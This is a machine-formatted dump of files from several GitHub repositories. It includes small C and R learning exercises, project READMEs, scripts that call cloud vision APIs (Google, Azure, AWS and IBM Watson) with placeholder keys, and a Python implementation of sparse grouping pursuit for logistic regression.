strc);\n return 0;\n}\n" }, { "alpha_fraction": 0.700952410697937, "alphanum_fraction": 0.7161904573440552, "avg_line_length": 36.57143020629883, "blob_id": "8ad62c2795053a4477af46308d0edac6f940cbb5", "content_id": "ab613ebbacc33879a1a3823fbc8374cdfac7e0e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 527, "license_type": "permissive", "max_line_length": 149, "num_lines": 14, "path": "/java/projects/todolist/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# todolist\n`jskyzero` `2017/12/31`\n\n## Overview\n\n+ a simpile todolist application powered by java.\n+ use `gson` to save to file.\n+ you can use some really excellent IDE like `IntelliJ IDEA`.\n+ anyway, now I use `vscode` and sometimes do the dirty work by hand.\n\n## Install & Run:\n\n+ if you use IDE like `IntelliJ IDEA`, it will be easy to run or build to jar, to run the jar you can use `java -classpath TodoList.jar TodoList.UI`.\n+ if you want learn maven, that't good, you can use `mvn install` then `mvn exec:java` to run." }, { "alpha_fraction": 0.5584415793418884, "alphanum_fraction": 0.5974025726318359, "avg_line_length": 13, "blob_id": "187ed900237459ff81a2c162b563efe38006bf29", "content_id": "6ec04353d56578e240a29047779873f8c3cfac8b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 154, "license_type": "permissive", "max_line_length": 20, "num_lines": 11, "path": "/c/hardwork/hardway/if.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#define SYSTEM 20\nint main() {\n int a = 20;\n#if SYSTEM == a\n printf(\"HELLO \");\n#endif\n#if SYSTEM == 20\n printf(\"WORLD\\n\");\n#endif\n}\n" }, { "alpha_fraction": 0.3550420105457306, "alphanum_fraction": 0.38445377349853516, "avg_line_length": 14.866666793823242, "blob_id": "324df5c8b296cfb40c671fd8fc6704f992eb0c12", "content_id": "27ccea0ff4ceff48539abe71db5c352b18fcb2ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 476, "license_type": "permissive", "max_line_length": 42, "num_lines": 30, "path": "/c/hardwork/hardway/pow.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <math.h> // for pow()\n\nint k, N, n;\ndouble ans;\nint a[32];\n\nvoid f(int _N, int _n) {\n if (_n < 0 || _N < 1) return;\n\n if (_N >= a[_n]) {\n f(_N - a[_n], _n);\n ans += pow(k, _n);\n } else\n f(_N, _n - 1);\n}\n\nint main() {\n scanf(\"%d %d\", &k, &N);\n a[0] = 1;\n for (int i = 1; i < 32; i++) {\n a[i] = 2 * a[i - 1];\n if (a[i] > N) {\n n = i - 1;\n break;\n }\n }\n f(N, n);\n printf(\"%.0lf\\n\", ans);\n}\n" }, { "alpha_fraction": 0.4370861053466797, "alphanum_fraction": 0.5165562629699707, "avg_line_length": 12.757575988769531, "blob_id": "161d45d555a8ce18c816f0f88f8b6c612af733eb", "content_id": "dc051d32e0c523aaeb860e6a9c4c0a8a09e253d6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 453, "license_type": "permissive", "max_line_length": 68, "num_lines": 33, "path": "/R/harwork/hardway/operator.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Operators in R\n\n# arithmetic operator\nv1 <- c(1, 2, 3)\nv2 <- c(4, 5, 6)\n\nprint(v1 + v2)\nprint(v1 - v2)\nprint(v1 * v2)\nprint(v1 / v2)\nprint(v2 %% v1)\nprint(v2 %/% v1)\nprint(v1 ^ v2)\n\n# relation operator\nprint (v1 < v1) # \"every < \" => \" < \"\n\n# logic operator \n# & | !\n\n# assignment operator\n# <- <<- =\n# -> ->>\n\n# others\nv <- 1:9\nprint(v)\n\nprint(-1 %in% v)\n\nM <- matrix( c(2, 6, 5, 1, 10, 4), nrow = 2, ncol = 3, byrow = TRUE)\nt <- M %*% t(M)\nprint(t)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5249999761581421, "avg_line_length": 19.16666603088379, "blob_id": "0472b20f7acef59ef5df5933ca2f1eb132c18f77", "content_id": "cd6c81e83acb8990035a096f5385348b51c756b3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 120, "license_type": "permissive", "max_line_length": 33, "num_lines": 6, "path": "/c/hardwork/hardway/argc_argv.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(int argc, char** argv) {\n char s[] = \"myworld\";\n int i = 3;\n printf(\"%10.*s %%\", i, s);\n}" }, { "alpha_fraction": 0.7283950448036194, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 15.199999809265137, "blob_id": "bd4cdf9cb106654d96d69349badd016b452cce57", "content_id": "2def1ad46cfab2b9aef3421fecf409625861718f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 185, "license_type": "permissive", "max_line_length": 28, "num_lines": 5, "path": "/java/projects/gridworld/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# GridWorld\n\n+ 当时写的很仓促,好几次都是踩线检查。\n+ 最开始浪着不用IDE,后面打脸\n+ 具体参考2015中级实训的参考界面吧,不做过多描述。\n" }, { "alpha_fraction": 0.6721698045730591, "alphanum_fraction": 0.698113203048706, "avg_line_length": 21.342105865478516, "blob_id": "6356b5cbe31b13a76caca21280b6c43a60969347", "content_id": "ef628cd44b13091f2be2b5f8850e6211f1c7e5aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 848, "license_type": "permissive", "max_line_length": 105, "num_lines": 38, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week12/Classes/Monster.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include\"Monster.h\"\nUSING_NS_CC;\n\nFactory* Factory::factory = NULL;\nFactory::Factory() {\n\tinitSpriteFrame();\n}\nFactory* Factory::getInstance() {\n\tif (factory == NULL) {\n\t\tfactory = new Factory();\n\t}\n\treturn factory;\n}\nvoid Factory::initSpriteFrame(){\n\tauto texture = Director::getInstance()->getTextureCache()->addImage(\"Monster.png\");\n\tmonsterDead.reserve(4);\n\tfor (int i = 0; i < 4; i++) {\n\t\tauto frame = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(258-48*i,0,42,42)));\n\t\tmonsterDead.pushBack(frame);\n\t}\n}\n\nSprite* Factory::createMonster() {\n\tSprite* mons = Sprite::create(\"Monster.png\", CC_RECT_PIXELS_TO_POINTS(Rect(364,0,42,42)));\n\tmonster.pushBack(mons);\n\treturn mons;\n}\n\nvoid Factory::removeMonster(Sprite* sp) {\n\n}\nvoid Factory::moveMonster(Vec2 playerPos,float time){\n\n}\n\nSprite* Factory::collider(Rect rect) {\n\n}" }, { "alpha_fraction": 0.39024388790130615, "alphanum_fraction": 0.39024388790130615, "avg_line_length": 16.428571701049805, "blob_id": "900cd9065f93cc7d2ee30a5989e9dfb01264bd12", "content_id": "37bca41dd4dada1db2fbe6482db12a7a6a3ed66c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 123, "license_type": "permissive", "max_line_length": 30, "num_lines": 7, "path": "/c/hardwork/hardway/static.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\t int main()\n\t {\n\t static double x;\n\t int x;\n\t printf(\"x is %d\", x);\n\t }\n\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.724252462387085, "avg_line_length": 20.5, "blob_id": "1e903bda9dcf30d58f0778c9314b09056ec17127", "content_id": "13b4f1621acf0dffa253f92371dc10e199b4b5c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 301, "license_type": "permissive", "max_line_length": 59, "num_lines": 14, "path": "/c/projects/MPI/helloworld/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# How to run it\n\n+ I asume you use linux, for instance ubuntu\n+ then use `sudo apt-get install libopenmpi-dev` to install\n+ use `mpicc helloworld.c` to compile c code to `a.out`\n+ then use `mpirun -np 4 a.out` to run.\n\nyou will see some output like\n```\nhelloworld\nhelloworld\nhelloworld\nhelloworld\n``` " } ]
202
rheehot/visionAI_study
https://github.com/rheehot/visionAI_study
edc14833031342956ba599858825773cbe4dca6c
bc9ba77e279a6060fd73c0b4909895a2982399b4
2e22bafda4543ea2682057cac98b3cd6b9ca0a62
refs/heads/main
2023-01-06T09:09:57.054221
2020-10-29T04:57:29
2020-10-29T04:57:29
308,221,593
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6890624761581421, "alphanum_fraction": 0.706250011920929, "avg_line_length": 31.049999237060547, "blob_id": "ba60dd9d7e12c7f9e987c809d268a18316a8188b", "content_id": "6bd4733344441622906deda2607fb0436f8f2f51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 640, "license_type": "no_license", "max_line_length": 62, "num_lines": 20, "path": "/PycharmProjects/IBMWatsonVisualRecognitionAPI/Createclassifier.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import json\nfrom ibm_watson import VisualRecognitionV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\nauthenticator = IAMAuthenticator('[IAMAuthenticator_key]')\nvisual_recognition = VisualRecognitionV3(\n version='2018-03-19',\n authenticator=authenticator\n)\nvisual_recognition.set_service_url('[server_url]')\n\n\nwith \\\n open('./resources/husky.zip', 'rb') as husky, \\\n open('./resources/cats.zip', 'rb') as cats:\n model = visual_recognition.create_classifier(\n 'dogs',\n positive_examples={'husky': husky},\n negative_examples=cats).get_result()\nprint(json.dumps(model, indent=2))" }, { "alpha_fraction": 0.6345177888870239, "alphanum_fraction": 0.6903553009033203, "avg_line_length": 20.88888931274414, "blob_id": "4eb892c14bfad690c113eb90e2a327e16d79305e", "content_id": "c90e5c925e17f17a4b0554ddc4897e1bbc02d73b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 66, "num_lines": 9, "path": "/PycharmProjects/AmazonRekognitionAPI/aws_connect.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import boto3\n\ns3 = boto3.resource('s3')\n\nfor bucket in s3.buckets.all():\n print(bucket.name)\n\ndata = open('puppies.jpg', 'rb')\ns3.buckets('vision20211').put_object(Key='puppies.jpg', Body=data)\n" }, { "alpha_fraction": 0.7735576629638672, "alphanum_fraction": 0.7740384340286255, "avg_line_length": 46.29545593261719, "blob_id": "792e71e93bbb0886dce6b78a865d1b40a7838540", "content_id": "75d10e4b94afb58ac7a040c950a1a0dcb15e1c80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2080, "license_type": "no_license", "max_line_length": 150, "num_lines": 44, "path": "/PycharmProjects/MicrosoftAzureCognitiveAPI/detection_face.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "from azure.cognitiveservices.vision.computervision import ComputerVisionClient\n#from azure.cognitiveservices.vision.computervision.models import OperationStatusCodes\nfrom azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes\nfrom msrest.authentication import CognitiveServicesCredentials\n\nfrom array import array\nimport os\nfrom PIL import Image\nimport sys\nimport time\n\n# Add your Computer Vision subscription key to your environment variables.\nif 'COMPUTER_VISION_SUBSCRIPTION_KEY' in os.environ:\n subscription_key = os.environ['COMPUTER_VISION_SUBSCRIPTION_KEY']\nelse:\n print(\"\\nSet the COMPUTER_VISION_SUBSCRIPTION_KEY environment variable.\\n**Restart your shell or IDE for changes to take effect.**\")\n sys.exit()\n# Add your Computer Vision endpoint to your environment variables.\nif 'COMPUTER_VISION_ENDPOINT' in os.environ:\n endpoint = os.environ['COMPUTER_VISION_ENDPOINT']\nelse:\n print(\"\\nSet the COMPUTER_VISION_ENDPOINT environment variable.\\n**Restart your shell or IDE for changes to take effect.**\")\n sys.exit()\n\n\n\ncomputervision_client = ComputerVisionClient(endpoint, CognitiveServicesCredentials(subscription_key))\n\n# Get an image with faces\nremote_image_url_faces = \"https://raw.githubusercontent.com/Azure-Samples/cognitive-services-sample-data-files/master/ComputerVision/Images/faces.jpg\"\n# Select the visual feature(s) you want.\n\nremote_image_features = [\"faces\"]\n# Call the API with remote URL and features\ndetect_faces_results_remote = computervision_client.analyze_image(remote_image_url_faces, remote_image_features)\n# Print the results with gender, age, and bounding box\nprint(\"Faces in the remote image: \")\nif (len(detect_faces_results_remote.faces) == 0):\n print(\"No faces detected.\")\nelse:\n for face in detect_faces_results_remote.faces:\n print(\"'{}' of age {} at location {}, {}, {}, {}\".format(face.gender, face.age,face.face_rectangle.left, face.face_rectangle.top, \\\n face.face_rectangle.left + face.face_rectangle.width, \\\n face.face_rectangle.top + face.face_rectangle.height))" }, { "alpha_fraction": 0.7284595370292664, "alphanum_fraction": 0.732375979423523, "avg_line_length": 29.639999389648438, "blob_id": "926163c0c711f5817c62841b4332d09e8156b810", "content_id": "f7a95d36cf06ec3dfd761dd46391d0767326bc81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 766, "license_type": "no_license", "max_line_length": 58, "num_lines": 25, "path": "/PycharmProjects/GoogleVisionAPI/logo_detection.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import os, io\nfrom google.cloud import vision\nfrom draw_vertice import drawVertices\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\nclient = vision.ImageAnnotatorClient()\n\nfile_name = 'logos.png'\nimage_folder = './resources/'\nimage_path = os.path.join(image_folder, file_name)\n\nwith io.open(image_path, 'rb') as image_file:\n content = image_file.read()\n\nimage = vision.Image(content=content)\nresponse = client.logo_detection(image=image)\nlogos = response.logo_annotations\n\nfor logo in logos:\n print('Logo Description:', logo.description)\n print('Confidence Score:', logo.score)\n print('-' * 50)\n vertices = logo.bounding_poly.vertices\n print('Vertices Values {0}'.format(vertices))\n drawVertices(content, vertices, logo.description)\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 18, "blob_id": "d8ae612091860774877b262adc3e6416ec50b968", "content_id": "09065358215fd27a23b217c93be34118268a0c3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 20, "license_type": "no_license", "max_line_length": 18, "num_lines": 1, "path": "/README.md", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "\"# visionAI_study\" \n" }, { "alpha_fraction": 0.6710424423217773, "alphanum_fraction": 0.6826254725456238, "avg_line_length": 24.39215660095215, "blob_id": "8d58995529a85715d4b92caca28758df589c7603", "content_id": "aa5211f334717d67ba8ef7877113ad4fe29c2e84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1295, "license_type": "no_license", "max_line_length": 83, "num_lines": 51, "path": "/PycharmProjects/GoogleVisionAPI/video_text_detection.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import io\nimport os\nimport cv2\nfrom PIL import Image\n\n# Imports the Google Cloud client library\nfrom google.cloud import vision\n#from google.cloud.vision import types #pip install google-cloud-vision == 1.0.0\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\n# Instantiates a client\nclient = vision.ImageAnnotatorClient()\n\nfile_name = 'logos.png'\nimage_folder = './resources/'\nimage_path = os.path.join(image_folder, file_name)\n\ndef detect_text(path):\n \"\"\"Detects text in the file.\"\"\"\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n\n #image = types.Image(content=content) #pip install google-cloud-vision == 1.0.0\n image = vision.Image(content=content)\n response = client.text_detection(image=image)\n texts = response.text_annotations\n string = ''\n\n for text in texts:\n string+=' ' + text.description\n return string\n\ncap = cv2.VideoCapture(0)\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n file = 'live.png'\n cv2.imwrite( file,frame)\n\n # print OCR text\n print(detect_text(file))\n\n # Display the resulting frame\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n" }, { "alpha_fraction": 0.7568027377128601, "alphanum_fraction": 0.7602040767669678, "avg_line_length": 27, "blob_id": "2380a8272d28adae4d49a29e12fae038af22fc6b", "content_id": "6fc99530e7842550565d9d9447782637ca24207f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 588, "license_type": "no_license", "max_line_length": 80, "num_lines": 21, "path": "/PycharmProjects/GoogleVisionAPI/text_detection.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import io\nimport os\nfrom google.cloud import vision\n# from google.cloud.vision import types\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\n\n# Instantiates a client\nclient = vision.ImageAnnotatorClient()\n\nfile_name = os.path.join(os.path.dirname(__file__), 'resources/GNC_big_1_9.jpg')\nwith io.open(file_name, 'rb') as image_file:\n content = image_file.read()\n\nimage = vision.Image(content=content)\nresponse = client.text_detection(image=image)\ntextAnnotations = response.text_annotations\n\nprint('Faces:')\nfor textAnnotations in textAnnotations:\n print(textAnnotations)\n" }, { "alpha_fraction": 0.6653992533683777, "alphanum_fraction": 0.7072243094444275, "avg_line_length": 25.399999618530273, "blob_id": "499ed9edeced69f29a148897ce41f370ec3ee839", "content_id": "a37654626a93cde12b039c316489db0a07758677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "no_license", "max_line_length": 68, "num_lines": 10, "path": "/PycharmProjects/AmazonRekognitionAPI/main.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import boto3\n# Let's use Amazon S3\ns3 = boto3.resource('s3')\n\n# Print out bucket names\nfor bucket in s3.buckets.all():\n print(bucket.name)\n# Upload a new file\ndata = open('puppies.jpg', 'rb')\ns3.Bucket('visiondemo2020').put_object(Key='puppies.jpg', Body=data)" }, { "alpha_fraction": 0.6789838075637817, "alphanum_fraction": 0.7043879628181458, "avg_line_length": 32.38461685180664, "blob_id": "e1660376981c8197656261f42a1a2fd8147b5ed7", "content_id": "b7ba6d43b78df52ab393e41e9372e08445435eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/PycharmProjects/IBMWatsonVisualRecognitionAPI/detect_face.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import json\nfrom watson_developer_cloud import VisualRecognitionV3\n\nvisual_recognition = VisualRecognitionV3(\n\t'2018-03-19', # 해당날짜 또는 그 날짜 이전 API버전 선택\n\turl='https://gateway.watsonplatform.net/visual-recognition/api',\n\tiam_api_key='[iam_api_key]') #낮은 버전:api_key\n\n\nwith open('./moviestars.jpg', 'rb') as images_file:\n faces = visual_recognition.detect_faces(images_file)\n\nprint(json.dumps(faces, indent=2))" }, { "alpha_fraction": 0.7165738344192505, "alphanum_fraction": 0.722841203212738, "avg_line_length": 36.81578826904297, "blob_id": "1a77f95fd30f9d11e852dba9e5a8c2d66b034020", "content_id": "9a1a3a35de170932c3b339ae5d6116a609c7dc22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 102, "num_lines": 38, "path": "/PycharmProjects/GoogleVisionAPI/gcp_connect.py", "repo_name": "rheehot/visionAI_study", "src_encoding": "UTF-8", "text": "import io\nimport os\nfrom google.cloud import vision\n# from google.cloud.vision import types\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=r'[KEY.json]'\n\n# Instantiates a client\nclient = vision.ImageAnnotatorClient()\n\nfile_name = os.path.join(os.path.dirname(__file__), 'resources/moviestars.jpg')\nwith io.open(file_name, 'rb') as image_file:\n content = image_file.read()\n\nimage = vision.Image(content=content)\nresponse = client.face_detection(image=image)\nfaceAnnotations = response.face_annotations\n\nlikehood = ('Unknown', 'Very Unlikely', 'Unlikely', 'Possibly', 'Likely', 'Very Likely')\n\nprint('Faces:')\nfor face in faceAnnotations:\n print('Detection Confidence {0}'.format(face.detection_confidence))\n print('Angry likelyhood: {0}'.format(likehood[face.anger_likelihood]))\n print('Joy likelyhood: {0}'.format(likehood[face.joy_likelihood]))\n print('Sorrow likelyhood: {0}'.format(likehood[face.sorrow_likelihood]))\n print('Surprised ikelihood: {0}'.format(likehood[face.surprise_likelihood]))\n print('Headwear likelyhood: {0}'.format(likehood[face.headwear_likelihood]))\n\n face_vertices = ['({0},{1})'.format(vertex.x, vertex.y) for vertex in face.bounding_poly.vertices]\n print('Face bound: {0}'.format(', '.join(face_vertices)))\n print('')\n\n# response = client.label_detection(image=image)\n# labels = response.label_annotations\n# print('Labels:')\n# for label in labels:\n# print(label.description)" } ]
10
Aryamanz29/m-a-c
https://github.com/Aryamanz29/m-a-c
79617f1b2a3de3dfa93c5bbb1db01abb896eb627
06fdbb253a93bcc065a82cfdeeec74514ba14761
0eb9398f7a7f5699dbe750d84f690f69878be6f6
refs/heads/master
2022-12-23T09:21:24.200295
2020-09-26T03:41:51
2020-09-26T03:41:51
298,730,988
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7474332451820374, "alphanum_fraction": 0.7474332451820374, "avg_line_length": 19.33333396911621, "blob_id": "e50dd5512e91156b1c48f1fe50c0e47e7d04581d", "content_id": "a1eec77ce9c20fefc07c1dd7f61c8c06b258c7b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 487, "license_type": "no_license", "max_line_length": 44, "num_lines": 24, "path": "/websiteenv/mac/shop/views.py", "repo_name": "Aryamanz29/m-a-c", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Product\n\ndef index(request):\n return render(request,\"shop/index.html\")\n\ndef about(request):\n return HttpResponse(\"about\")\n\ndef contact(request):\n return HttpResponse(\"contact\")\n\ndef tracker(request):\n return HttpResponse(\"tracker\")\n\ndef search(request):\n return HttpResponse()\n\ndef productview(request):\n return HttpResponse()\n\ndef checkout(request):\n return HttpResponse()" } ]
1
yuyangstatistics/projects
https://github.com/yuyangstatistics/projects
6f1e8dc5ceb385b9646c7fff91284864e2a40348
6f235ce83d9b82a8e2dbc77a521cf9bdecda56a3
09a8f28c21ed1b8035380f74e8806c8a5bc276d4
refs/heads/main
2023-07-06T14:30:51.117044
2023-07-04T01:46:19
2023-07-04T01:46:19
308,781,333
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.7435897588729858, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 37.5, "blob_id": "99c68171cd9cf4f30a9a1218bf3fe2155f1802a5", "content_id": "3756c8fdd670b230ea5a820210622e9a34c9e5f0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "permissive", "max_line_length": 52, "num_lines": 2, "path": "/rbm_summarizer/start_rbm.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "export PYTHONPATH=`pwd`\npython train_textRBM/run_textRBM.py >& log/rbm_log &\n\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.47992992401123047, "avg_line_length": 28.662338256835938, "blob_id": "32d7a2e506694db267e28e8e64db79bc48ed549c", "content_id": "dfb72ddeb346d1d763e4c5cb8e8c573647f4f3cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6851, "license_type": "no_license", "max_line_length": 101, "num_lines": 231, "path": "/wellsfargo/notebooks/group.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef prob_safe(x, b):\n \"\"\" Calculate the probability of Y = 1 given x.\n\n Parameters\n ----------\n x: array\n Features. d-dimensional.\n b: array \n Coefficients. d-dimensional. \n\n Returns\n -------\n Conditional probability of Y = 1 given x.\n \"\"\"\n return 1.0 / (1.0 + np.exp(-np.matmul(x, b)))\n\n\ndef soft_thresh(b, thresh):\n \"\"\" Soft-thresholding function.\n\n Parameters\n ----------\n b: float\n Coefficient. \n thresh: float \n Threshold. \n\n Returns\n -------\n Soft-thresholded coefficient.\n \"\"\"\n if (b > thresh):\n return b - thresh\n elif (b < -thresh):\n return b + thresh\n else:\n return 0.0\n\n\ndef LogitGroupingPursuit(x,\n y,\n lambda_par,\n tau_par=0.1,\n rho=10.0,\n max_iter=1000,\n tol=1e-4):\n \"\"\" Compute the minimizer of Sparse Grouping Pursuit. \n\n This implementation combines MM-LLA and ADMM. \n Given an estimate beta(t) at t-th iteration.\n\n (1) Constructing majorization function. \n Pen_0(beta) <= |beta| if |beta(t)| <= tau.\n <= 1 if |beta(t)| >= tau.\n Pen_G(beta) <= |beta(t)_j - beta(t)_j'| if |beta(t)_j - beta(t)_j'| <= tau\n <= 1 if |beta(t)_j - beta(t)_j'| >= tau\n At (t+1)-th iteration, we solve:\n\n minimize\n Loss(beta) + Weighted Lasso_0(beta) + Weighted Lasso_G(beta)\n\n (2) For ADMM, we solve an equivalent minimization:\n\n minimize\n Loss(beta) + Weighted Lasso(gamma1) + Weighted Lasso(gamma2)\n subject to\n gamma1 = beta\n gamma2 = A * beta\n \n where gamma1 is ADMM copy of beta, gamma2 is difference between beta,\n A is a matrix defines gamma2. \n \n (3) Iterate until convergence. \n Zou (2008) proves MM-LLA only need to iterate for 2-3 times. \n\n References:\n MM: Hunter (2000) Quantile regression via an MM algorithm. JCGS. \n LLA: Zou (2008) One-step sparse estimates in nonconcave penalized likelihood models. AoS.\n ADMM: Boyd (2011) Distributed optimization and statistical learning via ADMM.\n\n Parameters\n ----------\n x: array \n Predictor matrix. n by d dimensional.\n\n y: array \n Response. Takes values 0, 1. n-dimensional.\n\n lambda_par: float\n Penalty parameter. \n\n tau_par: float\n Threshold in truncated lasso penalty. \n\n rho: float\n ADMM penalty parameter. For computation only.\n\n max_iter: integer\n Maximum iteration number. \n\n tol: float\n Numerical precision. \n\n Returns\n -------\n A tuple of objects: (beta, gamma1, gamma2, prob_safe(x, beta))\n\n beta: array\n Estimated coefficients. d-dimensional.\n\n gamma1: array\n A copy of beta in ADMM. d-dimensional. For convergence check only. \n\n gamma2: array\n Estimated coefficients difference. (d-1)-dimensional. \n\n prob_safe(x, beta): array\n Estimated probability Y = 1 given x for each observation. \n \"\"\"\n\n n, d = x.shape[0], x.shape[1]\n\n beta = np.zeros(d)\n\n for _ in range(3): # LLA loop\n\n # A is matrix that defines linear constraint:\n # gamma1 = beta\n # gamma2 = A * beta \n gamma1 = beta.copy()\n gamma2 = np.zeros(d - 1)\n A = np.zeros((d - 1, d))\n\n idx = np.argsort(beta)\n for i in range(d - 1): \n j, l = idx[i], idx[i + 1]\n gamma2[i] = beta[j] - beta[l]\n A[i, j], A[i, l] = 1.0, -1.0\n\n # defines weights in weighted lasso\n nonzero1 = np.abs(beta) >= tau_par\n nonzero2 = np.abs(gamma2) >= tau_par\n\n # u is dual variable for gamma1 in ADMM\n # w is dual variable for gamma2 in ADMM\n u = np.zeros(d)\n w = np.zeros(d - 1)\n\n for iter in range(max_iter): # ADMM loop\n\n # minimize beta: Newton-Raphson (IRLS). \n for iter_newton in range(max_iter):\n\n p = prob_safe(x, beta)\n\n # gradient\n grad = -np.matmul(\n x.T, y - p) + rho * (beta - gamma1 + u) + rho * np.matmul(\n A.T, (np.matmul(A, beta) - gamma2 + w))\n\n # hessian matrix\n hess = np.matmul(np.matmul(x.T, np.diag(p * (1.0 - p))),\n x) + rho * (np.eye(d) + np.matmul(A.T, A))\n\n beta_tmp = beta - np.linalg.solve(hess, grad)\n\n # for numerical stability, beta is constrained ||beta|| <= 20. \n if (np.linalg.norm(beta_tmp) > 20.0):\n beta_tmp = beta_tmp / np.linalg.norm(beta_tmp)\n\n change = beta_tmp - beta\n\n # termination criteria\n if (np.linalg.norm(change) < d * tol):\n break\n\n # update beta\n beta = beta_tmp.copy()\n\n # min gamma1: Proximal gradient, soft-thresholding\n gamma1 = beta + u\n for j in range(d):\n if (not nonzero1[j]):\n gamma1[j] = soft_thresh(gamma1[j],\n lambda_par / (tau_par * rho))\n\n # min gamma2: Proximal gradient, soft-thresholding\n gamma2 = np.matmul(A, beta) + w\n for j in range(d - 1):\n if (not nonzero2[j]):\n gamma2[j] = soft_thresh(gamma2[j],\n lambda_par / (tau_par * rho))\n\n # update u\n r1 = beta - gamma1\n u += r1\n\n # update w\n r2 = np.matmul(A, beta) - gamma2\n w += r2\n\n # termination criteria\n if (np.dot(r1, r1) + np.dot(r2, r2) <= d * tol * tol):\n break\n\n # Grouping the coefficients.\n # Calculate grouped coefficients by average.\n for _ in range(3):\n group = np.zeros(d)\n cutoff = np.abs(gamma2) > tau_par\n k = 0\n idx = np.argsort(beta)\n for i in range(d - 1):\n j, l = idx[i], idx[i + 1]\n if (cutoff[i]):\n group[j], group[l] = k, k + 1\n k = k + 1\n else:\n group[j], group[l] = k, k\n for i in range(k + 1):\n beta[group == i] = beta[group == i].mean()\n beta = np.where(np.abs(beta) <= tau_par, 0, beta)\n\n idx = np.argsort(beta)\n for i in range(d - 1):\n j, l = idx[i], idx[i + 1]\n gamma2[i] = beta[j] - beta[l]\n\n return (beta, gamma1, gamma2, prob_safe(x, beta))" }, { "alpha_fraction": 0.6338720917701721, 